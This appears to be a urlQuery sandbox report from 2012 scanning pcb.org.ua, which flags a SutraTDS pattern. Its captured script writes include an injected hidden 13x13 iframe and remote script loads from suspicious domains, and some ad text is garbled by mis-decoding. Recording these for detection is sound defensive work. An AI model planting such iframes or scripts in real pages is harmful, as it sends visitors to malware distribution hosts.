Overview

URLhttp://pcb.org.ua/
IP91.219.195.20
ASNAS49693 Best-Hoster Group Co. Ltd
Location Russian Federation
Report completed2012-11-10 00:30:07 CET
StatusLoading report..
urlQuery Alerts Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 91.219.195.20

Date Alerts / IDS URL IP
2013-02-11 14:27:250 / 6http://wek-21.ru/2011/10/page/191.219.195.20
2013-01-24 09:46:580 / 5http://wek-21.ru/sadovyy-uchastok/123-kollektivnyy-sad.html91.219.195.20
2013-01-24 09:39:330 / 6http://wek-21.ru/sadovyy-uchastok91.219.195.20
2013-01-05 01:58:590 / 6http://wek-21.ru/sadovyy-uchastok/123-kollektivnyy-sad.html91.219.195.20
2012-12-26 09:20:050 / 4http://wek-21.ru/2011/0491.219.195.20
2012-12-21 03:53:332 / 0http://tokov.net/main/fanfiction/628-tak-ne-byvaet-ch-7.html91.219.195.20

Last 6 reports on ASN: AS49693 Best-Hoster Group Co. Ltd

Date Alerts / IDS URL IP
2013-03-18 17:50:001 / 0http://online-jobs.ru/91.219.194.15
2013-03-18 17:49:481 / 0http://www.online-jobs.ru/91.219.194.15
2013-03-18 08:34:011 / 3http://serfers.ru/go.php?sid=4091.219.194.26
2013-03-17 23:04:341 / 0http://serfers.ru/got.php?sid=4091.219.194.26
2013-03-17 22:38:241 / 0http://serfers.ru/go.php?sid=4091.219.194.26
2013-03-17 21:18:251 / 2http://serfers.ru/got.php?sid=4091.219.194.26



JavaScript

Executed Scripts (11)


Executed Evals (1)

#1 JavaScript::Eval (size: 10059, repeated: 1)

function DropDownMenuX(id) {
    this.type = "horizontal";
    this.delay = {
        "show": 0,
        "hide": 400
    };
    this.position = {
        "level1": {
            "top": 0,
            "left": 0
        },
        "levelX": {
            "top": 0,
            "left": 0
        }
    };
    this.iframename = 0;
    this.fixIeSelectBoxBug = false;
    this.zIndex = {
        "visible": 500,
        "hidden": -1
    };
    this.browser = {
        "ie": Boolean(document.body.currentStyle),
        "ie5": (navigator.appVersion.indexOf("MSIE 5.5") != -1 || navigator.appVersion.indexOf("MSIE 5.0") != -1),
        "ie6": (navigator.appVersion.indexOf("MSIE 6.0") != -1)
    };
    if (!this.browser.ie) {
        this.browser.ie5 = false;
        this.browser.ie6 = false
    }
    this.init = function() {
        if (!document.getElementById(this.id)) {
            return alert("DropDownMenuX.init() failed. Element '" + this.id + "' does not exist.")
        }
        if (this.type != "horizontal" && this.type != "vertical") {
            return alert("DropDownMenuX.init() failed. Unknown menu type: '" + this.type + "'")
        }
        if (this.browser.ie && this.browser.ie5) {
            fixWrap()
        }
        fixSections();
        parse(document.getElementById(this.id).childNodes, this.tree, this.id)
    };

    function fixSections() {
        var arr = document.getElementById(self.id).getElementsByTagName("div");
        var sections = new Array();
        var widths = new Array();
        for (var i = 0; i < arr.length; i++) {
            if (arr[i].className == "section") {
                sections.push(arr[i])
            }
        }
        for (var i = 0; i < sections.length; i++) {
            widths.push(getMaxWidth(sections[i].childNodes))
        }
        for (var i = 0; i < sections.length; i++) {
            sections[i].style.width = (widths[i]) + "px"
        }
        if (self.browser.ie) {
            for (var i = 0; i < sections.length; i++) {
                setMaxWidth(sections[i].childNodes, widths[i])
            }
        }
    }
    function fixWrap() {
        var elements = document.getElementById(self.id).getElementsByTagName("a");
        for (var i = 0; i < elements.length; i++) {
            if (/item2/.test(elements[i].className)) {
                elements[i].innerHTML = '<div nowrap="nowrap">' + elements[i].innerHTML + '</div>'
            }
        }
    }
    function getMaxWidth(nodes) {
        var maxWidth = 0;
        for (var i = 0; i < nodes.length; i++) {
            if (nodes[i].nodeType != 1 || /section/.test(nodes[i].className)) {
                continue
            }
            if (nodes[i].offsetWidth > maxWidth) {
                maxWidth = nodes[i].offsetWidth
            }
        }
        return maxWidth
    }
    function setMaxWidth(nodes, maxWidth) {
        for (var i = 0; i < nodes.length; i++) {
            if (nodes[i].nodeType == 1 && /item2/.test(nodes[i].className) && nodes[i].currentStyle) {
                if (self.browser.ie5 || self.browser.ie6) {
                    nodes[i].style.width = (maxWidth) + "px"
                } else {
                    nodes[i].style.width = (maxWidth - parseInt(nodes[i].currentStyle.paddingLeft) - parseInt(nodes[i].currentStyle.paddingRight)) + "px"
                }
            }
        }
    }
    function parse(nodes, tree, id) {
        for (var i = 0; i < nodes.length; i++) {
            if (1 != nodes[i].nodeType) {
                continue
            }
            switch (true) {
            case /\bitem1\b / .test(nodes[i].className):
                nodes[i].id = id + "-" + tree.length;
                tree.push(new Array());
                nodes[i].onmouseover = itemOver;
                nodes[i].onmouseout = itemOut;
                break;
            case /\bitem2\b / .test(nodes[i].className):
                nodes[i].id = id + "-" + tree.length;
                tree.push(new Array());
                nodes[i].onmouseover = itemOver;
                nodes[i].onmouseout = itemOut;
                break;
            case /\bsection\b / .test(nodes[i].className):
                nodes[i].id = id + "-" + (tree.length - 1) + "-section";
                nodes[i].onmouseover = sectionOver;
                nodes[i].onmouseout = sectionOut;
                var box1 = document.getElementById(id + "-" + (tree.length - 1));
                var box2 = document.getElementById(nodes[i].id);
                var el = new Element(box1.id);
                if (1 == el.level) {
                    if ("horizontal" == self.type) {
                        box2.style.top = box1.offsetTop + box1.offsetHeight + self.position.level1.top + "px";
                        if (self.browser.ie5) {
                            box2.style.left = self.position.level1.left + "px"
                        } else {
                            box2.style.left = box1.offsetLeft + self.position.level1.left + "px"
                        }
                    } else if ("vertical" == self.type) {
                        box2.style.top = box1.offsetTop + self.position.level1.top + "px";
                        if (self.browser.ie5) {
                            box2.style.left = box1.offsetWidth + self.position.level1.left + "px"
                        } else {
                            box2.style.left = box1.offsetLeft + box1.offsetWidth + self.position.level1.left + "px"
                        }
                    }
                } else {
                    box2.style.top = box1.offsetTop + self.position.levelX.top + "px";
                    box2.style.left = box1.offsetLeft + box1.offsetWidth + self.position.levelX.left + "px"
                }
                self.sections.push(nodes[i].id);
                self.sectionsShowCnt.push(0);
                self.sectionsHideCnt.push(0);
                if (self.fixIeSelectBoxBug && self.browser.ie6) {
                    nodes[i].innerHTML = nodes[i].innerHTML + '<iframe id="' + nodes[i].id + '-iframe" class="' + self.iframename + 'frame" src="javascript:false" scrolling="no" frameborder="0" style="position: absolute; top: 0px; left: 0px; display: none; "></iframe>'
                }
                break
            }
            if (nodes[i].childNodes) {
                if (/\bsection\b/.test(nodes[i].className)) {
                    parse(nodes[i].childNodes, tree[tree.length - 1], id + "-" + (tree.length - 1))
                } else {
                    parse(nodes[i].childNodes, tree, id)
                }
            }
        }
    }
    function itemOver() {
        self.itemShowCnt++;
        var id_section = this.id + "-section";
        if (self.visible.length) {
            var el = new Element(lastItemOfArray(self.visible));
            el = document.getElementById(el.getParent().id);
            if (/item\d-active/.test(el.className)) {
                el.className = el.className.replace(/(item\d)-active/, "$1")
            }
        }
        if (stringInArray(self.sections, id_section)) {
            clearTimers();
            self.sectionsHideCnt[itemInArray(self.sections, id_section)]++;
            var cnt = self.sectionsShowCnt[itemInArray(self.sections, id_section)];
            var timerId = setTimeout(function(a, b) {
                return function() {
                    self.showSection(a, b)
                }
            }(id_section, cnt), self.delay.show);
            self.timers.push(timerId)
        } else {
            if (self.visible.length) {
                clearTimers();
                var timerId = setTimeout(function(a, b) {
                    return function() {
                        self.showItem(a, b)
                    }
                }(this.id, self.itemShowCnt), self.delay.show);
                self.timers.push(timerId)
            }
        }
    };

    function itemOut() {
        self.itemShowCnt++;
        var id_section = this.id + "-section";
        if (stringInArray(self.sections, id_section)) {
            self.sectionsShowCnt[itemInArray(self.sections, id_section)]++;
            if (stringInArray(self.visible, id_section)) {
                var cnt = self.sectionsHideCnt[itemInArray(self.sections, id_section)];
                var timerId = setTimeout(function(a, b) {
                    return function() {
                        self.hideSection(a, b)
                    }
                }(id_section, cnt), self.delay.hide);
                self.timers.push(timerId)
            }
        }
    };

    function sectionOver() {
        self.sectionsHideCnt[itemInArray(self.sections, this.id)]++;
        var el = new Element(this.id);
        var parent = document.getElementById(el.getParent().id);
        if (!/item\d-active/.test(parent.className)) {
            parent.className = parent.className.replace(/(item\d)/, "$1-active")
        }
    };

    function sectionOut() {
        self.sectionsShowCnt[itemInArray(self.sections, this.id)]++;
        var cnt = self.sectionsHideCnt[itemInArray(self.sections, this.id)];
        var timerId = setTimeout(function(a, b) {
            return function() {
                self.hideSection(a, b)
            }
        }(this.id, cnt), self.delay.hide);
        self.timers.push(timerId)
    };
    this.showSection = function(id, cnt) {
        if (typeof cnt != "undefined") {
            if (cnt != this.sectionsShowCnt[itemInArray(this.sections, id)]) {
                return
            }
        }
        this.sectionsShowCnt[itemInArray(this.sections, id)]++;
        if (this.visible.length) {
            if (id == lastItemOfArray(this.visible)) {
                return
            }
            var el = new Element(id);
            var parents = el.getParentSections();
            for (var i = this.visible.length - 1; i >= 0; i--) {
                if (stringInArray(parents, this.visible[i])) {
                    break
                } else {
                    this.hideSection(this.visible[i])
                }
            }
        }
        var el = new Element(id);
        var parent = document.getElementById(el.getParent().id);
        if (!/item\d-active/.test(parent.className)) {
            parent.className = parent.className.replace(/(item\d)/, "$1-active")
        }
        if (document.all) {
            document.getElementById(id).style.display = "block"
        }
        document.getElementById(id).style.visibility = "visible";
        document.getElementById(id).style.zIndex = this.zIndex.visible;
        if (this.fixIeSelectBoxBug && this.browser.ie6) {
            var div = document.getElementById(id);
            if (div.currentStyle.border == null) {
                div.style.borderLeftWidth = 0;
                div.style.borderRightWidth = 0;
                div.style.borderTopWidth = 0;
                div.style.borderBottomWidth = 0
            }
            var iframe = document.getElementById(id + "-iframe");
            iframe.style.width = div.offsetWidth + parseInt(div.currentStyle.borderLeftWidth) + parseInt(div.currentStyle.borderRightWidth);
            iframe.style.height = div.offsetHeight + parseInt(div.currentStyle.borderTopWidth) + parseInt(div.currentStyle.borderBottomWidth);
            iframe.style.top = -parseInt(div.currentStyle.borderTopWidth);
            iframe.style.left = -parseInt(div.currentStyle.borderLeftWidth);
            iframe.style.zIndex = -1;
            iframe.style.display = "block"
        }
        this.visible.push(id)
    };
    this.showItem = function(id, cnt) {
        if (typeof cnt != "undefined") {
            if (cnt != this.itemShowCnt) {
                return
            }
        }
        this.itemShowCnt++;
        if (this.visible.length) {
            var el = new Element(id + "-section");
            var parents = el.getParentSections();
            for (var i = this.visible.length - 1; i >= 0; i--) {
                if (stringInArray(parents, this.visible[i])) {
                    break
                } else {
                    this.hideSection(this.visible[i])
                }
            }
        }
    };
    this.hideSection = function(id, cnt) {
        if (typeof cnt != "undefined") {
            if (cnt != this.sectionsHideCnt[itemInArray(this.sections, id)]) {
                return
            }
            if (id == lastItemOfArray(this.visible)) {
                for (var i = this.visible.length - 1; i >= 0; i--) {
                    this.hideSection(this.visible[i])
                }
                return
            }
        }
        var el = new Element(id);
        var parent = document.getElementById(el.getParent().id);
        if (/item\d-active/.test(parent.className)) {
            parent.className = parent.className.replace(/(item\d)-active/, "$1")
        }
        document.getElementById(id).style.zIndex = this.zIndex.hidden;
        document.getElementById(id).style.visibility = "hidden";
        if (document.all) {
            document.getElementById(id).style.display = "none"
        }
        if (stringInArray(this.visible, id)) {
            if (id == lastItemOfArray(this.visible)) {
                this.visible.pop()
            } else {}
        } else {}
        this.sectionsHideCnt[itemInArray(this.sections, id)]++
    };

    function Element(id) {
        this.menu = self;
        this.id = id;
        this.getLevel = function() {
            var s = this.id.substr(this.menu.id.length);
            return countSubStr(s, "-")
        };
        this.getParent = function() {
            var s = this.id.substr(this.menu.id.length);
            var a = s.split("-");
            a.pop();
            return new Element(this.menu.id + a.join("-"))
        };
        this.hasParent = function() {
            var s = this.id.substr(this.menu.id.length);
            var a = s.split("-");
            return a.length > 2
        };
        this.hasChilds = function() {
            return Boolean(document.getElementById(this.id + "-section"))
        };
        this.getParentSections = function() {
            var s = this.id.substr(this.menu.id.length);
            s = s.substr(0, s.length - "-section".length);
            var a = s.split("-");
            a.shift();
            a.pop();
            var s = this.menu.id;
            var parents = [];
            for (var i = 0; i < a.length; i++) {
                s += ("-" + a[i]);
                parents.push(s + "-section")
            }
            return parents
        };
        this.level = this.getLevel()
    };

    function clearTimers() {
        for (var i = self.timers.length - 1; i >= 0; i--) {
            clearTimeout(self.timers[i]);
            self.timers.pop()
        }
    };
    var self = this;
    this.id = id;
    this.tree = [];
    this.sections = [];
    this.sectionsShowCnt = [];
    this.sectionsHideCnt = [];
    this.itemShowCnt = 0;
    this.timers = [];
    this.visible = []
};

function itemInArray(inArray, srchItem) {
    for (var i = 0; i < inArray.length; i++) {
        if (inArray[i] === srchItem) {
            return i
        }
    }
    return -1
};

function stringInArray(inArray, srchItem) {
    for (var i = 0; i < inArray.length; i++) {
        if (inArray[i] === srchItem) {
            return true
        }
    }
    return false
};

function countSubStr(srcStr, subStr) {
    return srcStr.split(subStr).length - 1
};

function lastItemOfArray(inArray) {
    return inArray[inArray.length - 1]
};

Executed Writes (5)

#1 JavaScript::Write (size: 1328, repeated: 1)

<a href="http://www.tak.ru" class="takru"><b>?;0G5==0O  5:;0<0:</b></a><br>-&nbsp;<a href="http://z890.takru.com/click.php?key=2094202157912211151979581469769677667692285130087" class="takru" target=_top onclick="javascript: f59256(this);" onmouseover="javascript: ff43924(876287,event);">70$ 2 45=L. >ABC?=> 2A5<. </a><br>-&nbsp;<a href="http://z890.takru.com/click.php?key=1886202119112211151979584961838052141560432522454" class="takru" target=_top onclick="javascript: f59256(this);" onmouseover="javascript: ff43924(236881,event);">=B5@=5B-<03078= :8B09A:8E B5;5D>=>2..</a><br>-&nbsp;<a href="http://z890.takru.com/click.php?key=2161202183912211151979589416928515406551859021177" class="takru" target=_top onclick="javascript: f59256(this);" onmouseover="javascript: ff43924(214212,event);">5A?;0B=>5 >1JO2;5=85! </a><br>-&nbsp;<a href="http://z890.takru.com/click.php?key=2146202183312211151979580134898328714566989826285" class="takru" target=_top onclick="javascript: f59256(this);" onmouseover="javascript: ff43924(864628,event);">8:@>:;8<0B</a><br>-&nbsp;<a href="http://z890.takru.com/click.php?key=1953202117512211151979588413582077660914484463557" class="takru" target=_top onclick="javascript: f59256(this);" onmouseover="javascript: ff43924(399033,event);">803@0, !80;8A, 528B@0 >B 75 @C1;59. =>=8<=..</a>

#2 JavaScript::Write (size: 271, repeated: 1)

<a href='http://www.liveinternet.ru/click' target=_blank><img src='//counter.yadro.ru/hit?t54.6;r;s1176*885*24;uhttp%3A//pcb.org.ua/;0.5416091196104842' alt='' title='LiveInternet: ?>:070=> G8A;> ?@>A<>B@>2 8 ?>A5B8B5;59 70 24 G0A0' border='0' width='88' height='31'></a>

#3 JavaScript::Write (size: 146, repeated: 3)

<iframe src="http://harmonyaboveaverage.ru/modelerdeclare.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>

#4 JavaScript::Write (size: 105, repeated: 1)

<script type="text/javascript" src="http://great8ds.eu/16123a/4e652cd044a456bee467d7151e3857ec"></script>

#5 JavaScript::Write (size: 80, repeated: 1)

<script type="text/javascript" src="http://web-rotator.net/cro/16123/"></script>


HTTP Transactions (32)


Request Response
GET / HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Set-Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1; path=/
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 09 Nov 2012 23:29:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
GET /image/pcb1.jpg HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:57:00 GMT
Accept-Ranges: bytes
Content-Length: 9361
GET /media/system/js/caption.js HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 2129
GET /modules/mod_swmenufree/DropDownMenuX_Packed.js HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 6342
GET /templates/pcb_shabl/css/template.css HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: text/css
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:25:58 GMT
Accept-Ranges: bytes
Content-Length: 2863
GET /images/M_images/printButton.png HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 14 Jul 2010 09:35:30 GMT
Accept-Ranges: bytes
Content-Length: 379
GET /image/leds.jpg HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:56:52 GMT
Accept-Ranges: bytes
Content-Length: 12477
GET /image/diodes.jpg HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:56:19 GMT
Accept-Ranges: bytes
Content-Length: 9771
GET /image/sensor.jpg HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:58:25 GMT
Accept-Ranges: bytes
Content-Length: 10096
GET /media/system/js/mootools.js HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
GET /templates/pcb_shabl/image/fonstr.gif HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:26:24 GMT
Accept-Ranges: bytes
Content-Length: 862
GET /image/mat.jpg HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:56:53 GMT
Accept-Ranges: bytes
Content-Length: 9822
GET /image/solar-mod.jpg HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:58:27 GMT
Accept-Ranges: bytes
Content-Length: 15620
GET /templates/pcb_shabl/image/circuit_board.jpg HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:26:20 GMT
Accept-Ranges: bytes
Content-Length: 26862
GET /image/led-lamp.jpg HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:34 GMT
Connection: keep-alive
Last-Modified: Wed, 28 Dec 2011 13:56:50 GMT
Accept-Ranges: bytes
Content-Length: 48080
GET /codes/15980/16123_pcb.org.ua.js HTTP/1.1

Host: mediarich.cc

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/1.2.3
Date: Sat, 10 Nov 2012 02:39:02 GMT
Content-Length: 155
Last-Modified: Tue, 25 Sep 2012 18:25:41 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /in.php?id=891272 HTTP/1.1

Host: z890.takru.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/0.7.67
Date: Fri, 09 Nov 2012 23:29:35 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 777
GET /cro/16123/ HTTP/1.1

Host: web-rotator.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
HTTP/1.1 200 OK

